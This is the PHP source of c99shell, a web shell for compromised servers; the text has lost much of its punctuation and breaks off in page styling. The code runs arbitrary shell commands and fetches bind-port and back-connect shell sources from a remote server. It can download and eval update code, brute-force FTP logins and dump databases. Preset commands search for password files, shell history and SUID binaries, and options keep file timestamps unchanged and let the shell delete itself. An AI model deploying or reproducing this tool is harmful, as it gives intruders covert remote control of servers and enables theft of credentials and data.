php c99shell.php v.1.0 pre-release build #12 Freeware license. © CCTeaM. c99shell - - www-, . httpccteam.rureleasesc99shell WEB httpccteam.ru ICQ UIN # 656555 + (ftp, samba) , ( tar) ( ) modify-time access-time ( . $filestealth) + PHP- + md5, unix-md5, sha1, crc32, base64 + + ftp- login;login etcpasswd ( 1100 ) , , , SQL) + include () $surl ( ) () cookie c99sh_surl, - $set_surl cookie set_surl + binbash , back connect ( , NetCat). + - + ( mail()) . ~ sql- ~ ~-~ , ( !) ICQ UIN #656555 feedback, . Last modify 29.07.2005 © Captain Crunch Security TeaM. Coded by tristram Starting calls if (!function_exists(getmicrotime)) {function getmicrotime() {list($usec, $sec) = explode( , microtime()); return ((float)$usec + (float)$sec);}} error_reporting(5); @ignore_user_abort(true); @set_magic_quotes_runtime(0); $win = strtolower(substr(PHP_OS,0,3)) == win; define(starttime,getmicrotime()); if (get_magic_quotes_gpc()) {if (!function_exists(strips)) {function strips(&$arr,$k=) {if (is_array($arr)) {foreach($arr as $k=$v) {if (strtoupper($k) != GLOBALS) {strips($arr[$k]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); foreach($_REQUEST as $k=$v) {if (!isset($$k)) {$$k = $v;}} $shver = 1.0 pre-release build #12; Current version CONFIGURATION AND SETTINGS if (!empty($unset_surl)) {setcookie(c99sh_surl); $surl = ;} elseif (!empty($set_surl)) {$surl = $set_surl; setcookie(c99sh_surl,$surl);} else {$surl = $_REQUEST[c99sh_surl]; Set this cookie for manual SURL } $surl_autofill_include = true; If true then search variables with descriptors (URLs) and save it in SURL. if ($surl_autofill_include and !$_REQUEST[c99sh_surl]) {$include = &; foreach (explode(&,getenv(QUERY_STRING)) as $v) {$v = explode(=,$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array(http,https,ssl,ftp,) as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name).=.urlencode($value).&;}}} if ($_REQUEST[surl_autofill_include]) {$includestr .= surl_autofill_include=1&;}} if (empty($surl)) { $surl = .$includestr; Self url } $surl = htmlspecialchars($surl); $timelimit = 0; time limit of execution this script over server quote (seconds), 0 = unlimited. Authentication $login = ; login DON'T FORGOT ABOUT PASSWORD!!! $pass = ; password $md5_pass = ; md5-cryped pass. if null, md5($pass) $host_allow = array(); array ({mask}1,{mask}2,...), {mask} = IP or HOST e.g. array(192.168.0.,127.0.0.1) $login_txt = Restricted area; http-auth message. $accessdeniedmess = a href=httpccteam.rureleasesc99shellc99shell v..$shver.a access denied; $gzipencode = true; Encode with gzip $updatenow = false; If true, update now (this variable will be false) $c99sh_updateurl = httpccteam.ruupdatec99shell; Update server $c99sh_sourcesurl = httpccteam.rufilesc99sh_sources; Sources-server $filestealth = true; if true, don't change modify- and access-time $donated_html = centerbOwned by hackerbcenter; If you publish free shell and you wish add link to your site or any other information, put here your html. $donated_act = array(); array (act1,act2,...), if $act is in this array, display $donated_html. $curdir = .; start folder $curdir = getenv(DOCUMENT_ROOT); $tmpdir = ; Folder for tempory files. If empty, auto-fill (tmp or %WINDIRtemp) $tmpdir_log = .; Directory logs of long processes (e.g. brute, scan...) $log_email = user@host.tld; Default e-mail for sending logs $sort_default = 0a; Default sorting, 0 - number of colomn, ascending or descending $sort_save = true; If true then save sorting-position using cookies. Registered file-types. array( {action1}=array(ext1,ext2,ext3,...), {action2}=array(ext4,ext5,ext6,...), ... ) $ftypes = array( html=array(html,htm,shtml), txt=array(txt,conf,bat,sh,js,bak,doc,log,sfc,cfg,htaccess), exe=array(sh,install,bat,cmd), ini=array(ini,inf), code=array(php,phtml,php3,php4,inc,tcl,h,c,cpp,py,cgi,pl), img=array(gif,png,jpeg,jfif,jpg,jpe,bmp,ico,tif,tiff,avi,mpg,mpeg), sdb=array(sdb), phpsess=array(sess), download=array(exe,com,pif,src,lnk,zip,rar,gz,tar) ); Registered executable file-types. array( string command{i}=array(ext1,ext2,ext3,...), ... ) {command} %f% = filename $exeftypes = array( getenv(PHPRC). -q %f% = array(php,php3,php4), perl %f% = array(pl,cgi) ); Highlighted files. array( i=array({regexp},{type},{opentag},{closetag},{break}) ... ) string {regexp} - regular exp. int {type} 0 - files and folders (as default), 1 - files only, 2 - folders only string {opentag} - open html-tag, e.g. b (default) string {closetag} - close html-tag, e.g. b (default) bool {break} - if true and found match then break $regxp_highlight = array( array(basename($_SERVER[PHP_SELF]),1,font color=yellow,font), example array(config.php,1) example ); $safemode_diskettes = array(a); This variable for disabling diskett-errors. array (i={letter} ...); string {letter} - letter of a drive $safemode_diskettes = range(a,z); $hexdump_lines = 8; lines in hex preview file $hexdump_rows = 24; 16, 24 or 32 bytes in one line $nixpwdperpage = 100; Get first N lines from etcpasswd $bindport_pass = c99; default password for binding $bindport_port = 31373; default port for binding $bc_port = 31373; default port for back-connect $datapipe_localport = 8081; default port for datapipe Command-aliases if (!$win) { $cmdaliases = array( array(-----------------------------------------------------------, ls -la), array(find all suid files, find -type f -perm -04000 -ls), array(find suid files in current dir, find . -type f -perm -04000 -ls), array(find all sgid files, find -type f -perm -02000 -ls), array(find sgid files in current dir, find . -type f -perm -02000 -ls), array(find config.inc.php files, find -type f -name config.inc.php), array(find config files, find -type f -name config), array(find config files in current dir, find . -type f -name config), array(find all writable folders and files, find -perm -2 -ls), array(find all writable folders and files in current dir, find . -perm -2 -ls), array(find all service.pwd files, find -type f -name service.pwd), array(find service.pwd files in current dir, find . -type f -name service.pwd), array(find all .htpasswd files, find -type f -name .htpasswd), array(find .htpasswd files in current dir, find . -type f -name .htpasswd), array(find all .bash_history files, find -type f -name .bash_history), array(find .bash_history files in current dir, find . -type f -name .bash_history), array(find all .fetchmailrc files, find -type f -name .fetchmailrc), array(find .fetchmailrc files in current dir, find . -type f -name .fetchmailrc), array(list file attributes on a Linux second extended file system, lsattr -va), array(show opened ports, netstat -an grep -i listen) ); } else { $cmdaliases = array( array(-----------------------------------------------------------, dir), array(show opened ports, netstat -an) ); } $sess_cookie = c99shvars; Cookie-variable name $usefsbuff = true; Buffer-function $copy_unset = false; Remove copied files from buffer after pasting Quick launch $quicklaunch = array( array(img src=.$surl.act=img&img=home alt=Home height=20 width=20 border=0,$surl), array(img src=.$surl.act=img&img=back alt=Back height=20 width=20 border=0,# onclick=history.back(1)), array(img src=.$surl.act=img&img=forward alt=Forward height=20 width=20 border=0,# onclick=history.go(1)), array(img src=.$surl.act=img&img=up alt=UPDIR height=20 width=20 border=0,$surl.act=ls&d=%upd&sort=%sort), array(img src=.$surl.act=img&img=refresh alt=Refresh height=20 width=17 border=0,), array(img src=.$surl.act=img&img=search alt=Search height=20 width=20 border=0,$surl.act=search&d=%d), array(img src=.$surl.act=img&img=buffer alt=Buffer height=20 width=20 border=0,$surl.act=fsbuff&d=%d), array(bEncoderb,$surl.act=encoder&d=%d), array(bToolsb,$surl.act=tools&d=%d), array(bProc.b,$surl.act=processes&d=%d), array(bFTP bruteb,$surl.act=ftpquickbrute&d=%d), array(bSec.b,$surl.act=security&d=%d), array(bSQLb,$surl.act=sql&d=%d), array(bPHP-codeb,$surl.act=eval&d=%d), array(bUpdateb,$surl.act=update&d=%d), array(bFeedbackb,$surl.act=feedback&d=%d), array(bSelf removeb,$surl.act=selfremove), array(bLogoutb,# onclick=if (confirm('Are you sure')) window.close()) ); Highlight-code colors $highlight_background = #c0c0c0; $highlight_bg = #FFFFFF; $highlight_comment = #6A6A6A; $highlight_default = #0000BB; $highlight_html = #1300FF; $highlight_keyword = #007700; $highlight_string = #000000; @$f = $_REQUEST[f]; @extract($_REQUEST[c99shcook]); END CONFIGURATION Next code isn't for editing @set_time_limit(0); $tmp = array(); foreach($host_allow as $k=$v) {$tmp[] = str_replace(,.,preg_quote($v));} $s = !^(.implode(,$tmp).)$!i; if (!preg_match($s,getenv(REMOTE_ADDR)) and !preg_match($s,gethostbyaddr(getenv(REMOTE_ADDR)))) {exit(a href=httpccteam.rureleasescc99shellc99shella Access Denied - your host (.getenv(REMOTE_ADDR).) not allow);} if (!empty($login)) { if (empty($md5_pass)) {$md5_pass = md5($pass);} if (($_SERVER[PHP_AUTH_USER] != $login) or (md5($_SERVER[PHP_AUTH_PW]) != $md5_pass)) { if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace( br, ,$donated_html));} header(WWW-Authenticate Basic realm=c99shell .$shver. .$login_txt.); header(HTTP1.0 401 Unauthorized); exit($accessdeniedmess); } } if ($act != img) { $lastdir = realpath(.); chdir($curdir); if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} $sess_data = unserialize($_COOKIE[$sess_cookie]); if (!is_array($sess_data)) {$sess_data = array();} if (!is_array($sess_data[copy])) {$sess_data[copy] = array();} if (!is_array($sess_data[cut])) {$sess_data[cut] = array();} $disablefunc = @ini_get(disable_functions); if (!empty($disablefunc)) { $disablefunc = str_replace( ,,$disablefunc); $disablefunc = explode(,,$disablefunc); } if (!function_exists(c99_buff_prepare)) { function c99_buff_prepare() { global $sess_data; global $act; foreach($sess_data[copy] as $k=$v) {$sess_data[copy][$k] = str_replace(,DIRECTORY_SEPARATOR,realpath($v));} foreach($sess_data[cut] as $k=$v) {$sess_data[cut][$k] = str_replace(,DIRECTORY_SEPARATOR,realpath($v));} $sess_data[copy] = array_unique($sess_data[copy]); $sess_data[cut] = array_unique($sess_data[cut]); sort($sess_data[copy]); sort($sess_data[cut]); if ($act != copy) {foreach($sess_data[cut] as $k=$v) {if ($sess_data[copy][$k] == $v) {unset($sess_data[copy][$k]); }}} else {foreach($sess_data[copy] as $k=$v) {if ($sess_data[cut][$k] == $v) {unset($sess_data[cut][$k]);}}} } } c99_buff_prepare(); if (!function_exists(c99_sess_put)) { function c99_sess_put($data) { global $sess_cookie; global $sess_data; c99_buff_prepare(); $sess_data = $data; $data = serialize($data); setcookie($sess_cookie,$data); } } foreach (array(sort,sql_sort) as $v) { if (!empty($_GET[$v])) {$$v = $_GET[$v];} if (!empty($_POST[$v])) {$$v = $_POST[$v];} } if ($sort_save) { if (!empty($sort)) {setcookie(sort,$sort);} if (!empty($sql_sort)) {setcookie(sql_sort,$sql_sort);} } if (!function_exists(str2mini)) { function str2mini($content,$len) { if (strlen($content) $len) { $len = ceil($len2) - 2; return substr($content, 0,$len).....substr($content,-$len); } else {return $content;} } } if (!function_exists(view_size)) { function view_size($size) { if (!is_numeric($size)) {return false;} else { if ($size = 1073741824) {$size = round($size1073741824100)100 . GB;} elseif ($size = 1048576) {$size = round($size1048576100)100 . MB;} elseif ($size = 1024) {$size = round($size1024100)100 . KB;} else {$size = $size . B;} return $size; } } } if (!function_exists(fs_copy_dir)) { function fs_copy_dir($d,$t) { $d = str_replace(,DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($o = readdir($h)) !== false) { if (($o != .) and ($o != ..)) { if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} if (!$ret) {return $ret;} } } closedir($h); return true; } } if (!function_exists(fs_copy_obj)) { function fs_copy_obj($d,$t) { $d = str_replace(,DIRECTORY_SEPARATOR,$d); $t = str_replace(,DIRECTORY_SEPARATOR,$t); if (!is_dir(dirname($t))) {mkdir(dirname($t));} if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_copy_dir($d,$t); } elseif (is_file($d)) {return copy($d,$t);} else {return false;} } } if (!function_exists(fs_move_dir)) { function fs_move_dir($d,$t) { $h = opendir($d); if (!is_dir($t)) {mkdir($t);} while (($o = readdir($h)) !== false) { if (($o != .) and ($o != ..)) { $ret = true; if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}} if (!$ret) {return $ret;} } } closedir($h); return true; } } if (!function_exists(fs_move_obj)) { function fs_move_obj($d,$t) { $d = str_replace(,DIRECTORY_SEPARATOR,$d); $t = str_replace(,DIRECTORY_SEPARATOR,$t); if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_move_dir($d,$t); } elseif (is_file($d)) { if(copy($d,$t)) {return unlink($d);} else {unlink($t); return false;} } else {return false;} } } if (!function_exists(fs_rmdir)) { function fs_rmdir($d) { $h = opendir($d); while (($o = readdir($h)) !== false) { if (($o != .) and ($o != ..)) { if (!is_dir($d.$o)) {unlink($d.$o);} else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} } } closedir($h); rmdir($d); return !is_dir($d); } } if (!function_exists(fs_rmobj)) { function fs_rmobj($o) { $o = str_replace(,DIRECTORY_SEPARATOR,$o); if (is_dir($o)) { if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} return fs_rmdir($o); } elseif (is_file($o)) {return unlink($o);} else {return false;} } } if (!function_exists(myshellexec)) { function myshellexec($cmd) { global $disablefunc; $result = ; if (!empty($cmd)) { if (is_callable(exec) and !in_array(exec,$disablefunc)) {exec($cmd,$result); $result = join(n,$result);} elseif (($result = `$cmd`) !== false) {} elseif (is_callable(system) and !in_array(system,$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable(passthru) and !in_array(passthru,$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,r))) { $result = ; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); } } return $result; } } if (!function_exists(tabsort)) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} if (!function_exists(view_perms)) { function view_perms($mode) { if (($mode & 0xC000) === 0xC000) {$type = s;} elseif (($mode & 0x4000) === 0x4000) {$type = d;} elseif (($mode & 0xA000) === 0xA000) {$type = l;} elseif (($mode & 0x8000) === 0x8000) {$type = -;} elseif (($mode & 0x6000) === 0x6000) {$type = b;} elseif (($mode & 0x2000) === 0x2000) {$type = c;} elseif (($mode & 0x1000) === 0x1000) {$type = p;} else {$type = ;} $owner[read] = ($mode & 00400)r-; $owner[write] = ($mode & 00200)w-; $owner[execute] = ($mode & 00100)x-; $group[read] = ($mode & 00040)r-; $group[write] = ($mode & 00020)w-; $group[execute] = ($mode & 00010)x-; $world[read] = ($mode & 00004)r-; $world[write] = ($mode & 00002) w-; $world[execute] = ($mode & 00001)x-; if ($mode & 0x800) {$owner[execute] = ($owner[execute] == x)sS;} if ($mode & 0x400) {$group[execute] = ($group[execute] == x)sS;} if ($mode & 0x200) {$world[execute] = ($world[execute] == x)tT;} return $type.join(,$owner).join(,$group).join(,$world); } } if (!function_exists(posix_getpwuid) and !in_array(posix_getpwuid,$disablefunc)) {function posix_getpwuid($uid) {return false;}} if (!function_exists(posix_getgrgid) and !in_array(posix_getgrgid,$disablefunc)) {function posix_getgrgid($gid) {return false;}} if (!function_exists(posix_kill) and !in_array(posix_kill,$disablefunc)) {function posix_kill($gid) {return false;}} if (!function_exists(parse_perms)) { function parse_perms($mode) { if (($mode & 0xC000) === 0xC000) {$t = s;} elseif (($mode & 0x4000) === 0x4000) {$t = d;} elseif (($mode & 0xA000) === 0xA000) {$t = l;} elseif (($mode & 0x8000) === 0x8000) {$t = -;} elseif (($mode & 0x6000) === 0x6000) {$t = b;} elseif (($mode & 0x2000) === 0x2000) {$t = c;} elseif (($mode & 0x1000) === 0x1000) {$t = p;} else {$t = ;} $o[r] = ($mode & 00400) 0; $o[w] = ($mode & 00200) 0; $o[x] = ($mode & 00100) 0; $g[r] = ($mode & 00040) 0; $g[w] = ($mode & 00020) 0; $g[x] = ($mode & 00010) 0; $w[r] = ($mode & 00004) 0; $w[w] = ($mode & 00002) 0; $w[x] = ($mode & 00001) 0; return array(t=$t,o=$o,g=$g,w=$w); } } if (!function_exists(parsesort)) { function parsesort($sort) { $one = intval($sort); $second = substr($sort,-1); if ($second != d) {$second = a;} return array($one,$second); } } if (!function_exists(view_perms_color)) { function view_perms_color($o) { if (!is_readable($o)) {return font color=red.view_perms(fileperms($o)).font;} elseif (!is_writable($o)) {return font color=white.view_perms(fileperms($o)).font;} else {return font color=green.view_perms(fileperms($o)).font;} } } if (!function_exists(c99getsource)) { function c99getsource($fn) { global $c99sh_sourcesurl; $array = array( c99sh_bindport.pl = c99sh_bindport_pl.txt, c99sh_bindport.c = c99sh_bindport_c.txt, c99sh_backconn.pl = c99sh_backconn_pl.txt, c99sh_backconn.c = c99sh_backconn_c.txt, c99sh_datapipe.pl = c99sh_datapipe_pl.txt, c99sh_datapipe.c = c99sh_datapipe_c.txt, ); $name = $array[$fn]; if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} else {return false;} } } if (!function_exists(c99sh_getupdate)) { function c99sh_getupdate($update = true) { $url = $GLOBALS[c99sh_updateurl].version=.urlencode(base64_encode($GLOBALS[shver])).&updatenow=.($updatenow10).&; $data = @file_get_contents($url); if (!$data) {return Can't connect to update-server!;} else { $data = ltrim($data); $string = substr($data,3,ord($data{2})); if ($data{0} == x99 and $data{1} == x01) {return Error .$string; return false;} if ($data{0} == x99 and $data{1} == x02) {return You are using latest version!;} if ($data{0} == x99 and $data{1} == x03) { $string = explode(x01,$string); if ($update) { $confvars = array(); $sourceurl = $string[0]; $source = file_get_contents($sourceurl); if (!$source) {return Can't fetch update!;} else { $fp = fopen(__FILE__,w); if (!$fp) {return Local error can't write update to .__FILE__.! You may download c99shell.php manually a href=.$sourceurl.uhereua.;} else {fwrite($fp,$source); fclose($fp); return Thanks! Updated with success.;} } } else {return New version are available .$string[1];} } elseif ($data{0} == x99 and $data{1} == x04) {eval($string); return 1;} else {return Error in protocol segmentation failed! (.$data.) ;} } } } if (!function_exists(mysql_dump)) { function mysql_dump($set) { global $shver; $sock = $set[sock]; $db = $set[db]; $print = $set[print]; $nl2br = $set[nl2br]; $file = $set[file]; $add_drop = $set[add_drop]; $tabs = $set[tabs]; $onlytabs = $set[onlytabs]; $ret = array(); $ret[err] = array(); if (!is_resource($sock)) {echo(Error $sock is not valid resource.);} if (empty($db)) {$db = db;} if (empty($print)) {$print = 0;} if (empty($nl2br)) {$nl2br = 0;} if (empty($add_drop)) {$add_drop = true;} if (empty($file)) { $file = $tmpdir.dump_.getenv(SERVER_NAME)._.$db._.date(d-m-Y-H-i-s)..sql; } if (!is_array($tabs)) {$tabs = array();} if (empty($add_drop)) {$add_drop = true;} if (sizeof($tabs) == 0) { retrive tables-list $res = mysql_query(SHOW TABLES FROM .$db, $sock); if (mysql_num_rows($res) 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} } $out = # Dumped by C99Shell.SQL v. .$shver. # Home page httpccteam.ru # # Host settings # MySQL version (.mysql_get_server_info().) running on .getenv(SERVER_ADDR). (.getenv(SERVER_NAME).). # Date .date(d.m.Y His). # DB .$db. #--------------------------------------------------------- ; $c = count($onlytabs); foreach($tabs as $tab) { if ((in_array($tab,$onlytabs)) or (!$c)) { if ($add_drop) {$out .= DROP TABLE IF EXISTS `.$tab.`;n;} recieve query for create table structure $res = mysql_query(SHOW CREATE TABLE `.$tab.`, $sock); if (!$res) {$ret[err][] = mysql_smarterror();} else { $row = mysql_fetch_row($res); $out .= $row[1].;nn; recieve table variables $res = mysql_query(SELECT FROM `$tab`, $sock); if (mysql_num_rows($res) 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode(`, `, array_keys($row)); $values = array_values($row); foreach($values as $k=$v) {$values[$k] = addslashes($v);} $values = implode(', ', $values); $sql = INSERT INTO `$tab`(`.$keys.`) VALUES ('.$values.');n; $out .= $sql; } } } } } $out .= #---------------------------------------------------------------------------------nn; if ($file) { $fp = fopen($file, w); if (!$fp) {$ret[err][] = 2;} else { fwrite ($fp, $out); fclose ($fp); } } if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} return $out; } } if (!function_exists(mysql_buildwhere)) { function mysql_buildwhere($array,$sep= and,$functs=array()) { if (!is_array($array)) {$array = array();} $result = ; foreach($array as $k=$v) { $value = ; if (!empty($functs[$k])) {$value .= $functs[$k].(;} $value .= '.addslashes($v).'; if (!empty($functs[$k])) {$value .= );} $result .= `.$k.` = .$value.$sep; } $result = substr($result,0,strlen($result)-strlen($sep)); return $result; } } if (!function_exists(mysql_fetch_all)) { function mysql_fetch_all($query,$sock) { if ($sock) {$result = mysql_query($query,$sock);} else {$result = mysql_query($query);} $array = array(); while ($row = mysql_fetch_array($result)) {$array[] = $row;} mysql_free_result($result); return $array; } } if (!function_exists(mysql_smarterror)) { function mysql_smarterror($type,$sock) { if ($sock) {$error = mysql_error($sock);} else {$error = mysql_error();} $error = htmlspecialchars($error); return $error; } } if (!function_exists(mysql_query_form)) { function mysql_query_form() { global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = Query was empty;} echo bErrorb br.$sql_query_error.br;} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) { echo table border=0trtdform name=c99sh_sqlquery method=POSTb; if (($sql_query) and (!$submit)) {echo Do you really want to;} else {echo SQL-Query;} echo bbrbrtextarea name=sql_query cols=100 rows=10.htmlspecialchars($sql_query).textareabrbrinput type=hidden name=act value=sqlinput type=hidden name=sql_act value=queryinput type=hidden name=sql_tbl value=.htmlspecialchars($sql_tbl).input type=hidden name=submit value=1input type=hidden name=sql_goto value=.htmlspecialchars($sql_goto).input type=submit name=sql_confirm value=Yes input type=submit value=Noformtd; if ($tbl_struct) { echo td valign=topbFieldsbbr; foreach ($tbl_struct as $field) {$name = $field[Field]; echo » a href=# onclick=document.c99sh_sqlquery.sql_query.value+='`.$name.`';b.$name.babr;} echo tdtrtable; } } if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} } } if (!function_exists(mysql_create_db)) { function mysql_create_db($db,$sock=) { $sql = CREATE DATABASE `.addslashes($db).`;; if ($sock) {return mysql_query($sql,$sock);} else {return mysql_query($sql);} } } if (!function_exists(mysql_query_parse)) { function mysql_query_parse($query) { $query = trim($query); $arr = explode ( ,$query); array array() { METHOD=array(output_type), METHOD1... ... } if output_type == 0, no output, if output_type == 1, no output if no error if output_type == 2, output without control-buttons if output_type == 3, output with control-buttons $types = array( SELECT=array(3,1), SHOW=array(2,1), DELETE=array(1), DROP=array(1) ); $result = array(); $op = strtoupper($arr[0]); if (is_array($types[$op])) { $result[propertions] = $types[$op]; $result[query] = $query; if ($types[$op] == 2) { foreach($arr as $k=$v) { if (strtoupper($v) == LIMIT) { $result[limit] = $arr[$k+1]; $result[limit] = explode(,,$result[limit]); if (count($result[limit]) == 1) {$result[limit] = array(0,$result[limit][0]);} unset($arr[$k],$arr[$k+1]); } } } } else {return false;} } } if (!function_exists(c99fsearch)) { function c99fsearch($d) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($f = readdir($h)) !== false) { if($f != . && $f != ..) { $bool = (empty($a[name_regexp]) and strpos($f,$a[name]) !== false) ($a[name_regexp] and ereg($a[name],$f)); if (is_dir($d.$f)) { $search_i_d++; if (empty($a[text]) and $bool) {$found[] = $d.$f; $found_d++;} if (!is_link($d.$f)) {c99fsearch($d.$f);} } else { $search_i_f++; if ($bool) { if (!empty($a[text])) { $r = @file_get_contents($d.$f); if ($a[text_wwo]) {$a[text] = .trim($a[text]). ;} if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);} if ($a[text_regexp]) {$bool = ereg($a[text],$r);} else {$bool = strpos( .$r,$a[text],1);} if ($a[text_not]) {$bool = !$bool;} if ($bool) {$found[] = $d.$f; $found_f++;} } else {$found[] = $d.$f; $found_f++;} } } } } closedir($h); } } if ($act == gofile) {if (is_dir($f)) {$act = ls; $d = $f;} else {$act = f; $d = dirname($f); $f = basename($f);}} Sending headers @ob_start(); @ob_implicit_flush(0); function onphpshutdown() { global $gzipencode,$ft; if (!headers_sent() and $gzipencode and !in_array($ft,array(img,download,notepad))) { $v = @ob_get_contents(); @ob_end_clean(); @ob_start(ob_gzHandler); echo $v; @ob_end_flush(); } } function c99shexit() { onphpshutdown(); exit; } header(Expires Mon, 26 Jul 1997 050000 GMT); header(Last-Modified .gmdate(D, d M Y His). GMT); header(Cache-Control no-store, no-cache, must-revalidate); header(Cache-Control post-check=0, pre-check=0, false); header(Pragma no-cache); if (empty($tmpdir)) { $tmpdir = ini_get(upload_tmp_dir); if (is_dir($tmpdir)) {$tmpdir = tmp;} } $tmpdir = realpath($tmpdir); $tmpdir = str_replace(,DIRECTORY_SEPARATOR,$tmpdir); if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} else {$tmpdir_logs = realpath($tmpdir_logs);} if (@ini_get(safe_mode) or strtolower(@ini_get(safe_mode)) == on) { $safemode = true; $hsafemode = font color=redON (secure)font; } else {$safemode = false; $hsafemode = font color=greenOFF (not secure)font;} $v = @ini_get(open_basedir); if ($v or strtolower($v) == on) {$openbasedir = true; $hopenbasedir = font color=red.$v.font;} else {$openbasedir = false; $hopenbasedir = font color=greenOFF (not secure)font;} $sort = htmlspecialchars($sort); if (empty($sort)) {$sort = $sort_default;} $sort[1] = strtolower($sort[1]); $DISP_SERVER_SOFTWARE = getenv(SERVER_SOFTWARE); if (!ereg(PHP.phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= . PHP.phpversion();} $DISP_SERVER_SOFTWARE = str_replace(PHP.phpversion(),a href=.$surl.act=phpinfo target=_blankbuPHP.phpversion().uba,htmlspecialchars($DISP_SERVER_SOFTWARE)); @ini_set(highlight.bg,$highlight_bg); FFFFFF @ini_set(highlight.comment,$highlight_comment); #FF8000 @ini_set(highlight.default,$highlight_default); #0000BB @ini_set(highlight.html,$highlight_html); #000000 @ini_set(highlight.keyword,$highlight_keyword); #007700 @ini_set(highlight.string,$highlight_string); #DD0000 if (!is_array($actbox)) {$actbox = array();} $dspact = $act = htmlspecialchars($act); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode($d); htmlheadmeta http-equiv=Content-Type content=texthtml; charset=windows-1251meta http-equiv=Content-Language content=en-ustitlephp echo getenv(HTTP_HOST); - c99shelltitleSTYLETD { FONT-SIZE 8pt; COLOR #ebebeb; FONT-FAMILY verdana;}BODY { scrollbar-face-color #800000; scrollbar-shadow-color #101010; scrollbar-highlight-color #101010; scrollbar-3dlight-color #101010; scrollbar-darkshadow-color #101010; scrollbar-track-color #101010; scrollbar-arrow-color #101010; font-family Verdana;}TD.header { FONT-WEIGHT normal; FONT-SIZE 10pt; BACKGROUND #7d7474; COLOR white; FONT-FAMILY verdana;}A { FONT-WEIGHT normal; COLOR #dadada; FONT-FAMILY verdana; TEXT-DECORATION none;}Aunknown { FONT-WEIGHT normal; COLOR #ffffff; FONT-FAMILY verdana; TEXT-DECORATION none;}A.Links { COLOR #ffffff; TEXT-DECORATION none;}A.Linksunknown { FONT-WEIGHT normal; COLOR #ffffff; TEXT-DECORATION none;}Ahover { COLOR #ffffff; TEXT-DECORATION underline;}.skin0{positionabsolute; width200px; border2px solid black; background-colormenu; font-familyVerdana; line-height20px; cursordefault; visibilityhidden;;}.skin1{cursor default; font menutext; position absolute; width 145px; background-color menu; border 1 solid buttonface;visibilityhidden; border 2 outset buttonhighlight; font-family Verdana,Geneva, Arial; font-size 10px; color black;}.menuitems{padding-left15px; padding-right10px;;}input{background-color #800000; font-size 8pt; color #FFFFFF; font-family Tahoma; border 1 solid #666666;}textarea{background-color #800000; font-size 8pt; color #FFFFFF; font-family Tahoma; border 1 solid #666666;}button{background-color #800000; font-size 8pt; color #FFFFFF; font-family Tahoma; border 1 solid #666666;}select{background-color #800000; font-size 8pt; color #FFFFFF; font-family Tahoma; border 1 solid #666666;}option {background-color #800000; font-size 8pt; color #FFFFFF; font-family Tahoma; border 1 solid #666666;}iframe {background-color #800000; font-size 8pt; color #FFFFFF; font-family Tahoma; border 1 solid #666666;}p {MARGIN-TOP 0px; MARGIN-BOTTOM 0px; LINE-HEIGHT 150%}blockquote{ font-size 8pt; font-family Courier, Fixed, Arial; border 8px solid #A9A9A9; padding 1em; margin-top 1em; margin-bottom 5em; margin-right 3em; margin-left 4em; background-color #B7B2B0;}body,td,th { font-family verdana; color #d9d9d9; font-size 11px;}body { background-color #000000;}styleheadBODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0centerTABLE style=BORDER-COLLAPSE collapse height=1 cellSpacing=0 borderColorDark=#666666 